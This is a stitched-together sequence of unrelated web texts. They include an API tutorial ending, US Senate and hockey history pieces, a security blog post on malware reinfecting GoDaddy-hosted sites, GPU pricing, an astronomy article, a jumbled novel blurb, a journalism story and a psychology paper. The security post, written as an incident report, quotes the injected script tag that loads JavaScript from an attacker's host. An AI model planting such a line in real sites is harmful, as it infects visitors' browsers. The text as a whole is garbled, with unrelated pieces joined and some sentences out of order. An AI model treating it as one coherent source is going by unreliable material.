Reviews and labels added to Google Book Search are not private , and are visible to all Internet users , either through the Google Books Web site or through a public feed URL .
To illustrate , consider that you can view all the reviews and labels created by a particular user , simply by accessing the user 's annotation feed at the URL http://books.google.com/books/feeds/users/USER_ID/volumes.
Note that the USER_ID in this URL must be the user 's unique identification number on Google Book Search and not his or her Google Accounts user name .
You 'll find the Google Book Search identification number of the user in his or her " My Library " URL link .
Conclusion
The Google Book Search Data API , although still under development , offers tremendous potential in allowing developers to integrate book search results into a Web application .
The examples in this article introduced you to Google Book Search volume feeds ; showed you how to search for videos by keyword , author , and title ; and illustrated how to extract book meta - data , including publisher and author information , thumbnail images and ISBN numbers , from search result feeds .
It also gave you a crash course in the community features of Google Book Search , illustrating how to programmatically add reviews and labels to book entries .
As these examples prove , the Google Book Search REST API offers developers a great deal of flexibility and freedom when it comes to creating new Web applications .
It 's very useful if you 're trying to mash up book search data with data from other Web services , or simply building a customized search interface for authors , publishers , or consumers .
Play with it sometime , and see what you think !
Downloadable resources
Related topics
SENATE
• Derivatives .
The Senate bill contains language pushed by Sen. Blanche Lincoln ( D - Ark. ) that would force banks to spin off their derivatives businesses into separate business entities .
It also pushes most derivatives trading on to public exchanges and subjects them to federal regulation .
• Volcker Rule .
The Senate bill prohibits banks from engaging in proprietary trading ( speculation with their own money ) but gives federal agencies latitude to make exemptions , a loophole some senators tried to kill .
• Federal Reserve .
Senate avoids the tough House language but does include a provision for examining the Fed ’s work during the financial crisis of the last three years .
• Consumer Financial Protection Agency .
Senate places the agency inside the Fed with a presidentially - appointed head .
•
Car loans .
Senate bill does not exempt car loans from the agency ’s remit , but conferees may head into the committee having been explicitly instructed to do so in a vote Monday .
ADVERTISEMENT
The week - long squabble over a proposed extension of unemployment benefits for 1.2 million Americans came down to the repeated objections of one man : Kentucky Sen. Jim Bunning .
With many Senators home for the weekend , Illinois Sen . Dick Durbin tried to pass the measure with a voice vote .
In such a vote , it takes a single objection to block passage .
Thus Bunning , a former baseball player who once pitched a perfect game , was able to stop the extension all by himself .
The Senate has now recessed for the weekend , according to HuffPo , which means tough luck for the unemployed .
The Daily Kos made a video of Bunning 's highlights :
With two teams trailing 3 - 0 in NHL conference semifinal series ( a disappointing contrast to the first round ) , the 1975 New York Islanders will get their share of mentions for the next few days until the Red Wings and Flyers are officially put out to pasture .
Those spunky Islanders , in their third season and first - ever playoffs , became the modern standard for " the last time a team came back from a 3 - 0 deficit " -- though I hear some baseball team did it in the '00s , but ... I mean , it 's baseball -- and the crazy thing is the Isles nearly did it twice that year .
They shocked the Penguins in the victory that put them in the history books , not even trailing for a second from Game 4 through Game 7 .
But in the next round , they fell behind 3 - 0 to the Flyers before taking the eventual champions to Game 7 , where Kate Smith sang their final song .
We have a few readers who were alive ( not me ) and conscious for that wild year , so this post is a good chance to share any memories you have or stories you were told .
if you have a tale , let 'em rip in comments .
The coverage of this historic comeback is surprisingly sparse .
[ Update :
Here are a few fresh quotes from Al Arbour to Chris Botta at FanHouse . ]
Here 's the only bit of video from the series I 've seen on the freetubes -- a Clark Gillies - Bob Paradise fight from , if the date is correct , Game 7 in Pittsburgh :
What follows is some of the available history about how they did it , as well as some other factoids from that stunning playoff year that hinted at the championships that would come five years later :
The 11 - Second Parise Goal
You know you 're around a longtime Islanders fan when " the 11 - second goal " or " the Parise goal " is shorthand for " I was there when it began . "
The third - year expansion Islanders had n't competed well enough to create much of a rivalry yet with the Rangers , but toward the end of 1974 - 75 that started to change .
It came to a head in that year 's best - of - three preliminary round series where the Blueshirts were heavy favorites .
The Islanders shocked the Short Island Smurfs in Game 1 at the Garden , 3 - 2 .
The Rangers pushed back with an 8 - 3 rout at the Coliseum in Game 2 .
In the decisive Game 3 , the Isles staked a 3 - 0 lead ( there it is again ) only to blow it in the third to force OT .
Contemporary reports had Billiy Smith standing on his head in the dying minutes just to get them that far .
The description of what followed is from Stan Fischler 's 1976 book , " The Triumphant Islanders : Hockey 's New Dynasty " ( price tag : $ 4.95 ! ) .
Eleven seconds from the opening faceoff of OT was all it took .
I think you 'll enjoy Fischler 's " parlance of the times " prose -- and a really odd analogy for Rod Gilbert 's reaction in defeat :
The puck skimmed along the boards to goalie Ed Giacomin 's left near the corner of the rink .
The Rangers burly left wing Steve Vickers got there first but he seemed to hesitate and , before Vickers could recover , Jude Drouin pounced on the loose puck like a starved tiger finding a piece of raw meat .
At that precise moment team J.P. Parise camped in front of Giacomin , wildly hoping for a passout .
Drouin was n't especially particular about his moves .
He peripherally detected Parise and just whipped the puck in the direction of the goal crease , hoping for the best .
Rangers defenseman Brad Park sensed trouble and desperately tried to envelop Parise in his arms in front of the net .
Park was a fatal split second too late .
Drouin 's passout moved like a crazed pinball , from the corner to the center and then -- POP ! -- it was deflected by Parise past goalie Giacomin and into the net as Park pulled down Parise and Rod Gilbert circled in front of the net like a Civil Aeronautics Board surveyor assessing a plane crash .
It was over just like that .
>>" The Triumphant Islanders : Hockey 's New Dynasty " ( Fischler , 1976 , p. 58 )
The Great 3 - 0 Comeback over the Penguins
Probably feeling pretty good about themselves after getting the upper hand on their older brothers for the first ( of many ) time (s ) , the Islanders moved on to face the Penguins and fell into a hole immediately .
Games 1 and 2 in Pittsburgh were 5 - 4 and 3 - 1 for the Pens .
In Game 3 on Long Island , the Penguins rode a third - period surge for a 6 - 4 win .
All looked lost .
It had been 33 years since the last ( and only ) time an NHL team came back from a 3 - 0 series deficit to win .
That was the famous 1942 Maple Leafs who did it in the Cup finals over Detroit .
Here 's Fischler 's description of conditions entering Game 4 , when the Pens would surely complete the sweep and create a playoff Battle of Pennsylvania in the next round :
The Islanders goaltending has been weak while Pittsburgh goalie Gary Inness frustrates them time and again with exceptional saves .
All - Star defenseman Denis Potvin is playing with a bruised left thigh , and right wing Bobby Nystrom is in a slump .
He has yet to score in the playoffs after scoring 27 goals during the regular season .
...
To inspire the club , Al Arbour makes a change in goal , inserting Glenn Resch who has not seen action since the second game of the Ranger series .
With the capacity crowd at Nassau Coliseum chanting " Chico , Chico ! " and with signs urging the Islanders to Souvenez - vous les Maple Leafs ( Remember the Maple Leafs ) , the Islanders win , 3 - 1 . The New York defense keeps the Penguins out of the slot and Resch turns back 27 of 28 Penguin shots .
>>
Fischler , p. 62
( Today , " remember the Maple Leafs " means something a bit different to Isles fans , who know that " What Would Gary Roberts Do ? " means " Go take a zone - long run at a defenseman and check him into the boards from behind . " )
The psychology of a seven - game series is great , is n't it ?
As the higher seed who failed to close out a sweep , at least the Penguins could finish out the series on home ice in Game 5 .
No sweat .
But Resch shines again and the Isles take Game 5 , 4 - 2 .
The series returns to Long Island .
Suddenly , the Penguins are facing hostile fans again , and if they do n't win Game 6 , what was once a cakewalk becomes a one - game , winner - take - all in front of nervous home fans .
After the Islanders take Game 6 4 - 1 , it 's back to Pittsburgh for that fateful game .
In a series that averaged more than six goals per game in the first six games , the tight , careful play of Game 7 would yield only one .
As these unreal moments always tend to go , the Islanders probably would n't have pulled it off if not for three friendly goal posts in the opening minutes .
Those posts were so good to the Isles that night that the rookie Resch literally kissed them .
The game remained scoreless until 5:18 left in the third -- remember , Pittsburgh had n't even led a game in the 235 minutes since Game 4 -- when the captain , an original Islander , the wise veteran and two - time Cup winner from the Bruins , Ed Westfall backhanded in the only goal the Islanders needed .
The Penguins had suffered the unthinkable .
The islanders had pulled off the impossible .
And for the next four decades and counting , broadcast and print coverage of every North American pro sports series that goes to 3 - 0 flashes " Toronto Maple Leafs - 1942 , New York Islanders - 1975 " as a familiar sign of hope or hopelessness for fans who are about to see their season end .
* * *
The Statement Year Ends in Philly
In the Cup semifinals , as mentioned the Islanders came back from a 3 - 0 series deficit again to force Game 7 in Philadelphia .
After Game 3 , with the Islanders down 3 - 0 for the second series in a row , Al Arbour joked to his team : " O.K. , we 've got them where we want them now . "
" I can't believe this , " Flyers captain Bobby Clarke said after Game 6 , when the Coliseum crowd was so loud that NBC broadcasters could n't hear each other .
But it ended there .
The Flyers brought out lucky charm Kate Smith to sing " God Bless America " right in Resch 's crease , which -- if you can believe this -- threw the rookie Resch off his pre-game routine .
From a New York Times look back on October 22 , 2004 :
Resch had an elaborate pregame ritual , Arbour said , and Smith 's presence " really threw Chico off . "
" He was n't in his routine , " Arbour said .
Resch agreed .
" She was singing right in my crease , " Resch , a television analyst for the Devils , said from his home in Minnesota .
" I could have dropped her if I wanted to .
I should have , I guess . "
Gary Dornhoefer scored on a long shot past Resch just 19 seconds into the game .
The Flyers won 4 - 1 .
Said Andre St. Laurent after the wild ride ended : " We know we can do it now , and a lot more teams in the NHL will have respect for us . "
Yeah , you could say that .
Who does n’t like the option of customisation ?
These days , we can make everything customised and thanks to the technology .
We have all the things according to our choices and preference .
For example , if we want to have pizza and there are multiple friends who are there for having lunch together then the choices of each …
0 SHARES Facebook Twitter
Update2 : Reply from GoDaddy : https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html
Update : Code used to exploit found : https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
We just got reports this morning of hundreds of sites getting reinfected at GoDaddy ( shared servers ) .
This is the new javascript being added to the sites :
< script src = ” http://holasionweb.com/oo.php”>< / script >
The changes were all made this morning between 2 am and 3 am , changing all PHP files with this new code .
All the sites we checked so far were updated ( WordPress 2.9.2 ) and using good permissions .
Plus . not all of them were using WordPress .
I do n’t want to see the “ users were not updated ” excuse again , please .
GoDaddy , any ideas to what is going on ?
Note that our previous solution will still clean it up : https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
The details are all the same from the previous attack , just using a new host ( and new victims ) :
https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
http://sucuri.net/malware/entry/MW:MROBH:1
Notice that this is not related to one specific platform .
Most of the sites we checked were using WordPress , but some were on Joomla or using other web applications .
Plus , very annoying since all the PHP files get modified .
As always , if you are having difficulties getting your site cleanup , send us an email at contact@sucuri.net or visit our site : http://sucuri.net.
We can get your sites clean up right away .
Also , consider checking out our site security monitoring .
We will monitor your sites 24×7 and alert you if it ever gets infected with malware , hacked or blacklisted .
Last month , Nvidia promised the world that its new GeForce GTX 400 - series graphics cards would hit stores on April 12 .
That date has come and gone , but after perusing the listings of several online retailers in the U.S. and Canada , we get the feeling Nvidia is n’t quite meeting demand .
We searched for cards at Newegg , TigerDirect , and ZipZoomFly in the United States , because those are the three computer hardware e-tailers with the most reviews on both our price search engine and ResellerRatings.com .
North of the border , we looked at NCIX .
The cards we found are listed below with available models highlighted in green .
All prices are in U.S. dollars except for NCIX ’s , which are in Canadian dollars .
We did n’t factor mail - in rebates into our prices .
Let ’s start with the GeForce GTX 480 , Nvidia ’s new flagship :
Price ( U.S. ) Price ( CA ) Model Newegg TigerDirect ZipZoomFly NCIX.com ASUS ENGTX480/2DI/1536MD5 $ 499.99 $ 549.00 $ 549.99 EVGA 015-P3-1480 -AR $ 499.99 $ 599.99 $ 539.99 EVGA 015-P3-1482-AR $ 529.99 $ 649.99 $ 569.99 Galaxy 80XLH5HS8GUX $ 499.99 $ 519.99 GIGABYTE GV - N480D5 - 15I - B $ 499.99 $ 600.00 MSI N480GTX M2D15 - B $ 549.99 MSI N480GTX - M2D15 $ 499.99 PALIT NE5TX480F09CB $ 549.99 PNY XLR8 VCGGTX480XPB $ 499.99 $ 549.99 Sparkle SXX4801536D5-NM
$ 549.99 ZOTAC ZT -40101-10P $ 499.99 $ 549.99 Median $ 499.99 $ 519.99 $ 574.99 $ 549.99 Overall median $ 519.99
Yep , you ’re reading that right .
We could only find a single GeForce GTX 480 at these four major e-tailers , and the card was selling for $ 20 above Nvidia ’s suggested retail price .
Do things get any prettier when we look at the GTX 470 ?
Price ( U.S. ) Price ( CA ) Model Newegg TigerDirect ZipZoomFly NCIX.com ASUS ENGTX470/2DI/1280MD5 $ 349.99 $ 429.99 $ 379.99 EVGA 012-P3-1470 -AR
$ 349.99 $ 429.99 $ 379.99 EVGA 012-P3-1472-AR $ 379.99 $ 459.99 $ 399.99 Galaxy 70XKH3HS8GUX $ 349.99 $ 369.99 GIGABYTE GV - N470D5 -13I - B $ 349.99 $ 530.00 GIGABYTE GV - N470UD - 13I $ 580.00 MSI N470GTX M2D12 - B $ 379.99 MSI N470GTX - M2D12 $ 349.99 PALIT NE5TX470F09DA $ 399.99 PNY XLR8 VCGGTX470XPB $ 349.99 $ 369.99 Sparkle SXX4701280D5-NM
$ 499.00 ZOTAC ZT - 40201-10P $ 349.99 $ 379.99 Median $ 349.99 $ 369.99 $ 459.99 $ 379.99 Overall median $ 369.99
It would appear so .
Here , a whopping four listings were n’t slapped with " back order , " " out of stock , " or " notify me " labels .
Unfortunately , though , only one of them came even close to Nvidia ’s $ 349 MSRP — the Galaxy card at TigerDirect .
ZipZoomFly marks up all of its listings by at least $ 50 , which hardly seems surprisingly considering the apparent dearth of available cards .
Sign Up For Email Updates
Join our newsletter to get the latest articles , news , & videos .
Need a refill on your cup of awesome today ?
As someone who spends a lot of time thinking about astronomy and the weird stuff that happens on a daily basis in space , I see a lot of amazing things .
You'd think I 'd get used to the awesomeness of astronomy , but the opposite is true : I 'm always spellbound by what I find .
Still , it takes a lot to seriously impress me , to really make me say Holy Frak .
Well , astronomers have just announced that they have found a massive star that has been flung out of the cluster in which it was born .
The star is huge -- 90 times the mass of the Sun -- and is screaming away from its nursery at 400,000 kilometers per hour .
Holy Frak .
This incredible image is from the ESO 's 2.2 meter telescope in Chile .
It shows an overview of the sprawling 30 Doradus star - forming cloud , located about 180,000 light years away in the satellite galaxy to the Milky Way called the Large Magellanic Cloud ( or the LMC to those in the know ) .
In the center of 30 Dor sits a vast cluster of stars called R136 .
The total combined mass of all the stars in R136 is unclear , but it has several that tip the cosmic scale at 100 times the mass of the Sun , which is the upper limit of how big a star can get without tearing itself apart .
The inset image is from Hubble , and shows the runaway star , named 30 Dor 016 .
It 's been suspected for some time of being a cannonball blasting its way across space away from the cluster , but new observations have pretty much clinched it .
They 've also pinned the mass of this star to that whopping amount of 90 times the mass of the Sun .
If you do n't think that 's a big deal , I 'll note that this equals 180 octillion tons -- that 's 180,000,000,000,000,000,000,000,000,000 tons , for those of you who have stock in the ASCII character for " 0 " .
Yeah .
Holy Frak .
The new observations , using Hubble 's new ultraviolet camera called the Cosmic Origins Spectrograph , confirm that this is a single star ( and not , say , a binary with two members each with 45 solar masses ) , making it one of the most massive stars ever seen .
This kind of star is extremely rare !
The UV observations also confirm that the star is plowing through the gas that lies in interstellar space in the LMC .
You can get a good idea of what 's going on in this closeup of the star :
It 's moving to the upper right in this image .
You can see it 's near the edge of a curved bubble of gas , with a sharp edge delineated to the right of the star .
That edge is a bow shock , a vast supersonic shock wave formed when the fierce wind of subatomic particles emitted by the star --- a super solar wind - slams into the gas around it .
If the star were just sitting there this bubble would be spherical with the star at the center .
But you can see the bubble is actually elongated , and the star is near the edge .
That 's a sure sign we 're looking at a star on the move .
Amazingly , it appears that the star is 375 light years from the cluster !
A star this massive can't live very long , a few million years at most .
At 400,000 kph , it takes about a million years to travel that distance , so that fits .
How the heck can you kick a star up to such incredible speeds ?
There are two ways we can think of : have it tossed around by the gravity of other stars in the cluster , or have it ejected when ( if it 's a binary star ) its companion explodes as a supernova .
For the latter supernova scenario , it 's not the explosion that accelerates the star , it 's the slingshot effect .
The two stars orbit each other at high speed , and when one blows up it loses so much mass it can't hold onto the other star .
Like an athlete spinning around for the hammer toss and then letting go , the star gets shot away at high speed .
The thing is , the cluster itself is too young to have seen such a supernova a million years ago , when the star must have begun its flight .
Plus , there 's no indication of the type of a mess left by such an explosion .
So the star must have been ejected when it reacted gravitationally to other stars .
If you take three stars , say , and let them interact , the least massive one will get flung away .
Take a few dozen and you get a beehive of activity , with several stars tossed out , some with very high speed .
The thing is , this star has 90 times the Sun 's mass !
That means the stars left behind are even more massive ... and we do see several stars in the cluster with masses as high as 100 - 120 times that of the Sun .
Yeah again .
Holy Frak .
So let me explain ... no , there is too much .
Let me sum up .
We have a stellar cluster with thousands of times the Sun 's mass embedded in a nebula furiously cranking out newborn stars .
A lot of them are near the physical upper limit of how big a star can get .
The whole thing is only a couple of million years old , a fraction of the galaxy 's lifespan .
One beefy star with 90 times the Sun 's mass got too close to some other stars , which summarily flung it out of the cluster at high speed , fast enough to cross the distance from the Earth to the Moon in an hour ( it took Apollo three days ) .
The star is barreling through the flotsam in that galaxy , its violent stellar wind carving out a bubble of gas that points right back to the scene of the crime , nearly 4 quadrillion kilometers and a million years behind it .
Hmmm .
Y'know , there are days I have a hard time getting out of bed .
The humdrum routine of the day yawns ahead of me ... but every now and again , as I lie there mustering up the courage to throw off the blanket and face the world , I get a glimmer that maybe today the Universe will once again refill my tank , make me look above and outside me , and remind me that truly , the place is full of awesome .
Today was such a day .
Image credit : Hubble : NASA , ESA , J. Walsh ( ST - ECF ) Acknowledgment : Z. Levay ( STScI ) .
ESO image : ESO Acknowledgments : J. Alves ( Calar Alto , Spain ) , B. Vandame , and Y. Beletski ( ESO ) , processing by B. Fosbury ( ST - ECF ) .
of Gor , also known as Counter Earth , where everything is dramatically different from anything he has ever experienced .
It emerges that Tarl is to be trained as a Tarnsman , one of the most honored positions in the rigid , caste - bound Gorean society .
He is disciplined by the best teachers and warriors that Gor has to offer . . . but to what end ?
Rediscover this brilliantly imagined world where men are masters and women live to serve their every desire .
Tarnsman of Gor is the 1st book in the Gorean Saga , but you may enjoy reading the series in any order .
… ( more Tarl Cabot has always believed himself to be a citizen of Earth .
He has no inkling that his destiny is far greater than the small planet he has inhabited for the first twenty - odd years of his life .
One frosty winter night in the New England woods , he finds himself transported to the planet
One of the aviation industry 's biggest critics of the Pentagon 's gajillion - dollar fighter jet has been temporarily barred from writing about the controversial plane .
Bill Sweetman has authored over 30 books on military aircraft , and now edits Defense Technology International , a monthly magazine put out by Aviation Week .
Few journalists today know more about tactical aircraft .
And few have been more critical of the F - 35 Joint Strike Fighter , the jet that 's eventually supposed to replace as much as 95 % of combat planes .
" The program is no longer at risk of failure , " he wrote in March on * Aviation Week 's * defense blog , Ares .
" It has already failed . "
But Sweetman , for the moment , wo n't be allowed to opine on the JSF .
Aviation
Week has pulled him from the beat .
The maker of the jet swears they had nothing whatsoever to do with the suspension .
" Lockheed Martin has not asked Aviation Week to take disciplinary action against Bill Sweetman nor have we asked that he be removed from reporting on the F - 35 program or any other Lockheed Martin program , " the company says in a statement .
But as the price tag for the supposedly low - cost JSF has grown – and as a once - ambitious test schedule has shrunk – Sweetman 's swipes at the program have gained more notoriety .
PBS ' News Hour , for instance , featured Sweetman in alate April segment that focused on the project 's flaws .
The following week , while Sweetman and his colleagues prepped for a trip Lockheed 's plant in Ft. Worth , Texas , he wrote on his Facebook page :
" Gentlemen , your target for tonight is Fort Worth .
Flacks are predicted to be numerous and persistent on the run-in and over the target , and bullshit is expected to be dense throughout the mission .
Synchronize watches and good luck . "
Shortly thereafter , Sweetman was asked to stop covering the JSF .
UPDATE : " Aviation Week is committed to providing objective aerospace and defense journalism based on independent and balanced coverage .
Following comments posted on his personal Facebook page , the editorial team has decided that Bill Sweetman will not be covering the F - 35 program for a period of time , " magazine spokesman Joe D'Andrea e-mails Danger Room .
" We will continue to hold our journalists to the highest standards of editorial integrity to best serve the aerospace and defense community . "
[ Photo : DoD ]
See Also :
Judgment and Decision Making , vol. 5 , no .
2 , April 2010 , pp. 110-115
Memory reflected in our decisions :
Higher working memory capacity predicts greater bias in risky choice Jonathan Corbin , * Todd McElroy and Cassie Black
Appalachian State University
The current study looks at the role working memory plays in risky - choice framing .
Eighty - six participants took the Automatic OSPAN , a measurement of working memory ; this was followed by a risky - choice framing task .
Participants with high working memory capacities demonstrated well pronounced framing effects , while those with low working memory capacities did not .
This pattern suggests that , in a typical risky - choice decision task , elaborative encoding of task information by those with high working memory capacity may lead them to a more biased decision compared to those with low working memory .
Keywords : Asian disease problem , framing , risky choice , working memory capacity , context , fuzzy - trace theory .
1 Introduction
Throughout our lives , we are faced with many small and large decisions that exist within a variety of contexts .
Many of these choices involve some aspect of risk , like choosing whether to invest in certain stocks , deciding on medical treatment options , or even deciding whether to risk human lives .
The most studied examples of risk and decision making involve risky choices presented within a positive or negative framework , or risky - choice framing effects .
Risky - choice framing effects are derived from Prospect Theory predictions ( Kahneman & Tversky , 1979 ) and have become one of the most studied examples of rational decision making .
According to Prospect
Theory the presentation of an outcome as either a loss or gain affects the amount of risk a person is willing to accept .
This effect is attributed to differences in perceived subjective value and is captured by the value function , which is concave for gains , yielding risk - aversive preferences , and convex for losses , yielding risk - seeking preferences .
In the most widely tested example , Tversky and Kahneman ( 1981 ) presented participants with an Asian disease problem wherein 600 lives were at stake .
Participants were then presented with a set of alternatives , one risk - free and the other risky .
The alternatives were framed either positively or negatively , in terms of people that would be “ saved ” or “ die ” .
Their findings revealed that , despite identical expected values , most participants preferred the risk - free alternative when the problem was framed positively and the risky alternative when framed negatively .
This type of task design is commonly referred to as “ risky - choice ” ( Levin , Schneider , & Gaeth , 1998 ) .
1.1 Working memory and framing
There has been considerable research and theoretical interest in how working memory capacity ( WMC ) may influence decision making .
Multiple studies have shown that WMC can predict differences in strategy use when encoding information ( Cokely , Kelley , & Gilchrist , 2006 ; McNamara & Scott , 2001 ; Turley - Ames & Whitfield , 2003 ) as well as number and strength of alternate hypotheses one can generate when making probability judgments ( Dougherty & Hunter , 2003 ) .
Those with high WMC appear to employ elaborative encoding techniques while those with low WMC tend to rely on rote - rehearsal ( Turley - Ames & Whitfield , 2003 ) .
The difference in encoding technique generally leads to superior decision making for those with high WMC ( Cokely & Kelley , 2009 ) .
The difference may distinguish high and low WMC with regard to traditional risky - choice framing tasks .
One dual - process model that focuses on memory is fuzzy - trace theory ( Reyna & Brainerd , 1989 ; Reyna & Brainerd , 1991 ; Reyna & Brainerd , 1995 ) .
Fuzzy - trace theory states that framing effects occur because people are focusing on the gist of information rather than verbatim information .
Gist information consists of people preferring something over nothing in the gains condition and nothing over something in the loss condition as compared to verbatim information which consists of the exact numerical quantities in the framing problem ( Reyna & Brainerd , 1991 ) .
Recent research by Kuhberger and Tanner ( 2009 ) has shown multiple replications of framing predictions made by fuzzy - trace theory .
Work with framing effects in children has discovered that younger children do not exhibit framing effects , due to the fact that they focus on verbatim information .
As children age , framing effects begin to appear ( Reyna & Ellis , 1994 ; Reyna & Farley , 2006 ) .
This corresponds to the finding that , as children age , their WMC increases ( Dempster , 1981 ) .
Accordingly , people with high WMC may encoding more elaborative representations that enable reasoning based on gist ( e.g. , encoding a richer context ) , while people with low WMC may primarily focus on salient and easily available numerical quantities ( verbatim ) .
The prediction that can be made from this theoretical approach is that high WMC participants should show framing effects while low WMC participants should show little or no framing effects ( e.g. , Reyna & Brainerd , 1991 ) .
Problem Gains Losses Imagine that the U.S. is preparing for the outbreak of an unusual Asian disease , which is expected to kill 600 people .
Two alternative programs to combat the disease have been proposed .
Assume that the exact scientific estimates of the consequences of the programs are as follows :
If program A is adopted , 200 people will be saved .
If program A is adopted , 400 people will die .
If Program B is adopted , there is a one - third probability that 600 people will be saved and a two - thirds probability that no people will be saved .
If Program B is adopted , there is a one - third probability that nobody will die and a two - thirds probability that 600 people will die .
Stanovich and West ( 2000 ) have suggested that non-normative reasoning would increase in tasks where working memory is vital or when it becomes overloaded .
In later research , Cokely and Kelley ( 2009 ) conducted a well - designed study in which participants were presented with a series of 40 gain / loss choice problems .
This study was designed to test predictions for expected - value choices and elaborative heuristic search .
Both the gain problems ( e.g. , “ gain $ 150 ” or “ 5 % chance of gaining $ 2000 ” ) and loss problems ( e.g. , “ lose $ 50 ” or “ 5 % chance to lose $ 4000 ” ) were presented in a numerical format .
People with a higher WMC made more choices that coincided with expected value compared to those with low WMC .
However , higher WMC was not associated with expected value calculations .
Instead , participants with higher WMC engaged in more thorough and elaborative heuristic based decision making .
While this methodology was appropriate for testing their hypotheses , it differs substantially from the typical risky - choice design ( Levin , Schneider , & Gaeth , 1998 ) represented by the Asian disease problem ( Table 1 ) .
One crucial difference between designs is the equality of expected value between alternatives .
In the Asian disease problem , the alternatives have equal expected values whereas in the Cokely and Kelley ( 2009 ) problems , the alternatives had unequal expected values .
Another difference lies in their presentational format .
Cokely and Kelley noted that a large amount of deliberation and contextualization of problems led to expected - value choices .
However , the numerical format used differs substantially from the context of the Asian disease problem .
In fact , prior research has shown that presentation of a decision task in the context of money shows a weaker framing effect compared to the context of human lives ( Fagley & Miller , 1997 ) .
Therefore , given the differences between the Cokely and Kelley , method and a typical risky - choice design , alternative predictions can be made for how working memory may interact with a decision task such as the Asian disease problem .
The current experiment investigates how WMC interacts with the framing of a decision problem using Tversky and Kahneman ’s ( 1981 ) Asian disease problem .
Two competing hypotheses make distinctly different predictions for how working memory may influence decisions in a risky - choice scenario .
First , one could expect the results to mirror those of Cokely and Kelley ( 2009 ) , in that people with high WMC are better able to process the probabilities within the task , leading to decreased framing effects as compared to those with low WMC .
Alternatively , research by Delaney & Sahakyan ( 2007 ) indicated that people with high WMC are more context dependent than those with low WMC .
Since risky - choice decision tasks such as the Asian disease problem are more contextually developed , a second hypothesis is that those with high WMC may be more affected by the contextual information within the scenario ( the frame ) than those with low WMC , leading to larger framing effects in those with high WMC .
The latter hypothesis is also consistent with theoretical predictions derived from fuzzy - trace theory ( Reyna & Brainerd , 1991 ) , and with the inference from developmental increases in both WMC and framing effects .
2 Methods
Eighty - six undergraduates in Appalachian State University ’s research pool participated in exchange for course credit .
One participant was excluded from the data set due to procedural problems , leaving the number of participants at eighty - five .
The Turner and Engle ( 1989 ) OSPAN task requires participants to verify the truth of math operations while trying to remember a set of unrelated letters .
This study uses an automated version of the Turner and Engle OSPAN task , developed by Unsworth , Heitz , Schrock and Engle ( 2005 ) .
For each trial , the participants were presented with a math problem and asked to determine the truth of the math problem ( i.e. 2/1 + 6 = 7 ) .
Immediately after the participants judged the truth of the math problem , they were presented with a letter to remember .
The operation - letter pairings were presented in sets of two to seven items .
Following each complete set , the participants were instructed to recall the letters in the order presented .
In order to ensure that participants were not trading off between solving the operations and remembering the letters , an 85 % accuracy criterion on the math operations was required .
The participants received several sets of practice trials before beginning the task .
For all of the span measures , items were scored for accuracy in specific item recall ( i.e. , correct letter ) as well as the correct position within the serial order of presentation .
Therefore the total score for the OSPAN represents total number of correct items as well as the correct ordinal position .
Participants entered the research lab , signed informed consent , and were asked to complete the OSPAN on the computer .
When they finished the task , they were given the Asian disease problem ( see Table 1 ) and asked to rate their decision on a 7 - point scale ranging from 1 ( Definitely would recommend A ) to 7 ( Definitely would recommend B ) .
3 Results
First , an independent samples t- test was run in order to determine whether or not there was a significant impact of the frame on decisions .
This analysis shows a significant framing effect t( 82 ) = – 2.67 , p = .009 , the level of risk - seeking was higher in the loss condition ( M= 4.28 ) than the gain condition ( M = 3.33 ) .
In order to look at the effect of working memory on framing , participants ’
OSPAN scores were entered into a general linear model as a covariate , with frame as the independent variable and their decision as the dependent variable .
The interaction between frame and OSPAN score was significant F ( 1 , 84 ) = 5.35 , p = .023 , while the addition of the OSPAN score to the model rendered the framing effect non-significant F( 1 , 84 ) = 1.336 , n.s.1
Another way of looking at the data is to explore participants in the high and low ends of the sample .
To do so , we constructed a model , calculating high and low working memory scores by adding and subtracting a standard deviation from the OSPAN mean ( M = 40.18 , high = 56.72 , low = 23.66 ) .
Each value was entered into a regression equation to predict one ’s decision on the Asian disease problem based on WMC .
Surprisingly , for those with high WMC , the model predicted large framing effects ( Gains = 3.06 , Losses = 4.8 ) whereas a reversal was predicted for those with low WMC ( Gains = 4.81 , Losses = 3.67 ) ( see Figure 1 ) .
4 Discussion
This experiment explored the impact of working memory capacity on the choices individuals make in a risky - choice scenario .
The results support the hypothesis that those who have high WMC are more sensitive to the frame within the risky - choice scenario , and therefore show framing effects , while the framing effect is absent among those with low WMC .
Our findings may provide insight for dual - processing approaches that have been widely embraced in the decision making literature ( e.g. , Epstein , Pacini , Denes - Raj , & Heier , 1996 ; Evans & Over , 1996 ; Kahneman & Frederick , 2002 ; Sloman , 1996 ; Stanovich , 1999 ) .
The dual - process accounts generally posit that individuals construe information in two different ways .
Consideration of working memory as a variable resource , which can determine cognitive ability for making rational choices , may help clarify future research in this area ( Cokely & Kelley , 2009 ) .
Similarly , some dual - process approaches have relied on effort and importance as determining factors for the two processing styles .
These findings tend to show that effort , as motivated through importance , will influence the likelihood of biases and decision making fallacies such as the framing effect ( e.g. , Biswas , 2009 ; Igou & Bless , 2007 ; Meyers - Leny & Maheswaran , 2004 ; McElroy & Seta , 2003 ) .
Future research in this area should consider how effort may influence an individual ’s ability to perform decision making tasks in light of working memory .
It may be the case that importance and effort can both facilitate improvement and overload working memory , depending upon personal and situational factors .
In related work , Stanovich and West ( 1998 , 1999 , 2000 ) have explored whether rational choice may be tied to intelligence .
Recently , Stanovich and West ( 2008 ) were surprised to find that there was a small interaction between SAT and framing , where those with higher scores displayed slightly larger framing effects ( opposite to their predictions ) .
Since working memory has been shown to have a moderate correlation with scores on IQ tests ( Luciano , et al. , 2001 ) , the association between framing effects and higher cognitive ability is consistent with our findings .
Further , Stanovich ( 2008 ) suggests an individual difference variable , the Master Rationality Motive ( MRM ) , as a means for understanding rational choice .
This approach suggests that individuals vary in how much they seek rational integration of information .
This motive is seen as the impetus for searching across preferences , ending in rational integration .
As Stanovich points out , the MRM is to be differentiated from cognitive ability or intelligence .
As Stanovich points out , the MRM can be differentiated from cognitive ability and intelligence .
However , the current data suggest that cognitive abilities , such as working memory capacity , can in some cases predict MRM activities .
A number of individual difference factors have been shown to attenuate the framing effect and are likely to rely on working memory .
